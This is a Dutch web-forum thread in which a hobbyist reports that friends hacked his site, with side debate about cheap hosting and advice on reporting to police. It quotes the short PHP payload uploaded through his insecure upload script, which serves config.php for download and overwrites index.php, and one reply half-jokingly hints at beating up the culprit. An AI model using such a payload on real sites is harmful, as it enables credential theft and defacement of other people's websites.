Hallo mijn site is ongeveer 1,5 uur geleden gehackt. Ik wilde naar mijn site gaan en opeens stond er dit: (http://eric.byethost8.com). wat moet ik nu doen??
[edit]
Topic gaat niet specifiek over php, daardoor verplaatst naar de koffiehoek.
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
Kun je er dan ook even bij vertellen wat jouw definities van goed en slecht zijn?
En bedenk ook, je weet pas of je een goede hostingprovider hebt, als alles goed fout is gegaan. Wanneer hij de boel dan in no-time weer online heeft, dan heb je een goede provider. De meeste knakenboeren geven echter niet thuis wanneer de boel in het 100 loopt...
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
Doen en kunnen, zijn 2 totaal verschillende zaken! Zolang een server draait, heb je geen enkele kennis nodig om de boel online te houden. Stort de boel echter in, dan wordt het een ander verhaal... Bij menig provider ontbreekt de benodigde kennis en kunde om een server goed te beheren. Daarnaast ontbreken noodprocedures of worden deze nooit getest.
Voor een paar euro in de maand kun je niet verwachten dat je een provider met royale service en kunde inhuurt. Bestaat gewoon niet, de kosten liggen namelijk veel hoger. Voor een hobby-site maakt dat echter niet uit, dan is 1 euro per maand een mooi goedkope hobby!
[quote='robin schreef op 15.06.2007 21:06']Ik praat over per jaar. :D
Ik betaal nog géén 28 euro per jaar..
- 8 GB trafic
- 150 MB webruimte
- Uitstekende support (Echt uitstekende, problemen over het algemeen dezelfde dag opgelost)
...[/quote]
- Noodstroomvoorziening
- Je wordt overal van op de hoogte gehouden
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld.
- Support medewerkers met kennis van zaken
- weinig downtime
- Fallback (mail)servers
Voor al dit vind ik zelf dat ik zeker niet teveel betaal...
ik heb antwoord gekregen van mijn provider. ze hebben mij een log gegeven waar een naam en ip in staat.
Namen zijn, Jurgen en Leon.
Jurgen heeft het volgende script geschreven:
<?header('Content-Type: application/octet-stream');
readfile("../../config.php");
$file = 'index.html';
$newfile = '../../index.php';
if (!copy($file, $newfile)) {
echo "failed to copy $file...\n";
}?>
hierop reageerde mijn provider op: Hi there ,
It appears they used some upload script you had installed , to upload there php script (into /upload/images) , then from there they ultimately had control of your webspace (as they could upload php scripts to it.. )
Log file attached .
Regards
YourSupportGroup.com
A member of the Byethost Internet Group
(ik zet het log er niet op vanwege de privacy)
-----------------------------
Jurgen zei later tegen mij dat hij in mijn config. php keek om ervan te leren dat het beter beveiligd moet worden. Echter heeft hij het config.php inhoud door gestuurd naar Leon. Leon heeft vervolgens ALLE mappen en scripts veranderd, waardoor ik nu echt alles kwijt ben. Leon beweert dat hij nog een backup van de scripts heeft gemaakt, maar die wil hij niet teruggeven.
Als ik het goed begrijp is Leon toch strafbaar bezig en Jurgen toch ook? Nog erger, deze mensen ken ik, ze waren mijn vrienden./
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.
[quote='PHP Newbie schreef op 15.06.2007 23:14']
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.
[/quote]
SanThe, dit valt bij een hoop hosters toch nog altijd vies tegen. En die fallback mailservers werken uitstekend :-)
Tja, lullig dat het is gebeurd, maar het is ook wel een klein beetje je eigen schuld. Je fiets niet op slot zetten en dan klagen dat die is verdwenen, is net zo iets...
Hopelijk heb je hier iets van geleerd: Het grote boze internet vereist goede beveiliging!
En verder: Je zou eens bij de politie aangifte kunnen doen. Het is alleen afhankelijk van de locale kennis en kunde of ze er ook iets mee gaan doen. Leon vraagt overigens wel om een kleine persoonlijke verbouwing... Maar dat heb ik natuurlijk niet gezegd, dan ben jij namelijk net zo strafbaar!
Ps. Ga lekker verder klooien met PHP, maar zet geen belangrijke data op jouw server wanneer je niet zeker weet of je de beveiliging goed op orde hebt. En van je fouten leer je, vergeet dat vooral niet.
Ik heb Eric belooft hem te gaan helpen met het beveiligen van alles, ik wil even kwijt dat ik Eric alleen maar even wou laten zien hoe simpel het is om zijn uploadscript te misbruiken. Helaas is het uit de hand gelopen en dat vind ik jammer. Ik ken Eric al 2 jaar en ik heb echt nooit iets lulligs willen doen tegen em. Wat Leon betreft is hij echt bij mij over de lijn gegaan. Leon is van het type 'ik weet niet wanneer ik moet ophouden' en straks ben ik de sjaak omdat hij nu erics bestanden heeft die hij niet wil teruggeven.
